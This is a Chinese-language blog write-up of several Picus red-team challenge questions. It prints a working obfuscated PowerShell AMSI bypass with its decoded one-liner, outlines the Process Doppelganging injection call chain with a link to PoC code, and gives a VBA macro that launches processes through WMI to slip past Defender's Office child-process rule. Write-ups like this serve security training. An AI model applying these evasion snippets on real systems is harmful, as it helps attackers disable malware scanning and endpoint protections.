PICUS RED TEAM部分题解

admin
admin
admin
100781
文章
86
评论
2021年5月29日04:16:15评论54 views字数 3044阅读10分8秒阅读模式

  害,昨天发的题目留言区也没人聊聊思路,还是我来吧。事件原因这里只介绍部分题解,如有兴趣回头整理一份完整的wp发出来。


第三题、What is the purpose of the obfuscated Powershell script below? Give some details about how it works


代码如下:


[Delegate]::CreateDelegate(("Func``3[String,$(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName),System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.Type')),[Object]([Ref].Assembly.GetType($([cHar]([ByTE]0x53)+[cHaR]([BytE]0x79)+[cHar](11730/102)+[cHAr](31+85)+[CHaR]([BYTe]0x65)+[cHAr](101+8)+[ChAr]([byte]0x2E)+[cHaR]([byte]0x4D)+[CHAR]([bytE]0x61)+[CHar]([bYTe]0x6E)+[Char]([bYTE]0x61)+[ChaR]([Byte]0x67)+[ChAR]([bYte]0x65)+[cHAR]([bytE]0x6D)+[char](152-51)+[Char]([bYtE]0x6E)+[cHaR]([BYTe]0x74)+[char](1150/25)+[CHaR](65)+[CHAr](114+3)+[ChAr](25+91)+[cHar]([ByTe]0x6F)+[CHar]([bYTE]0x6D)+[CHAr]([BytE]0x61)+[chaR]([bYte]0x74)+[cHar](105)+[cHar](4329/39)+[cHAr]([bYTe]0x6E)+[cHAr](966/21)+[CHaR]([BytE]0x41)+[cHar]([BYTe]0x6D)+[cHAr]([ByTE]0x73)+[cHAr]([bYTE]0x69)+[Char]([BytE]0x55)+[chAr]([bytE]0x74)+[cHar](5355/51)+[CHar]([BytE]0x6C)+[CHaR](195-80)))),('GetField')).Invoke(''+$([SysTEm.NET.WEbUtILITy]::HtMLDEcodE('amsi'))+'InitFailed',(('NonPublic,Static') -as[String].Assembly.GetType('System.Reflection.BindingFlags'))).SetValue($null,$True);

其实这个题目时最简单的了,可以说是,我们先把最后的那部分拿出来,即


([SysTEm.NET.WEbUtILITy]::HtMLDEcodE('amsi'))+'InitFailed'


运行查看效果:


PICUS RED TEAM部分题解


看到这个东西有的人基本就可以猜到这个脚本的作用了,那就是bypass amsi。然后中间使用了大量的char、byte来隐藏其真实调用,解码得到:


PICUS RED TEAM部分题解


如果是公众号老粉,自然知道这个干什么用的,因为之前也发过类似的demo:


[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


详细的这里就不展开来讲了,有兴趣的可以看一下这个文章:https://www.unma.sk/posts/amsi-bypass/ 或者看一下团队之前在defcon上面的演讲:https://www.bilibili.com/video/BV12f4y1Q7Vm?p=5


第七题、Process Doppelganging is a well-known Process Injection technique used by various malware. However, It can be easily detected by Windows Defender (and other AVs) since it is an old technique. Please validate Herpaderping, a newer technique which is similar to Process Doppelganging, by compiling and executing the PoC code.


这个呢,就是一种特殊的进程注入技术,api调用链如下:

CreateTransaction –> CreateFileTransacted –> WriteFile –> CreateSection –> NtCreateProcessEx –> RtlCreateProcessParametersEx –> VirtualAllocEx –> WriteProcessMemory –> NtCreateThreadEx



代码地址如下:https://github.com/hasherezade/process_doppelganging


第九题、As an attacker, you are targeting an environment in which creation of a child process from office applications is blocked or heavily monitored by defenders. Please, provide a method for code execution on the target system by using a macro document.


这个说白了就是asr绕过。asr规则的


D4F940AB-401B-4EFC-AADC-AD5F3C50688A


其介绍如下:Block all Office applications from creating child processes


其实本质就是绕过这个规则。比如一个简单的启动cmd的代码:


Sub Auto_Open() CreateObject("WScript.Shell").Run "cmd.exe", 0End Sub



PICUS RED TEAM部分题解


把代码换成下面的:


  Set objWMIService = GetObject("winmgmts:\.rootcimv2")  Set objStartup = objWMIService.Get("Win32_ProcessStartup")  Set objConfig = objStartup.SpawnInstance_  Set objProcess = GetObject("winmgmts:\.rootcimv2:Win32_Process")  WmiExec = objProcess.Create(targetPath,Null,objConfig,intProcessID)


父进程就变成了


PICUS RED TEAM部分题解


成功bypass。


     ▼
更多精彩推荐,请关注我们

PICUS RED TEAM部分题解



本文始发于微信公众号(鸿鹄实验室):PICUS RED TEAM部分题解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月29日04:16:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PICUS RED TEAM部分题解https://cn-sec.com/archives/293396.html

发表评论

匿名网友 填写信息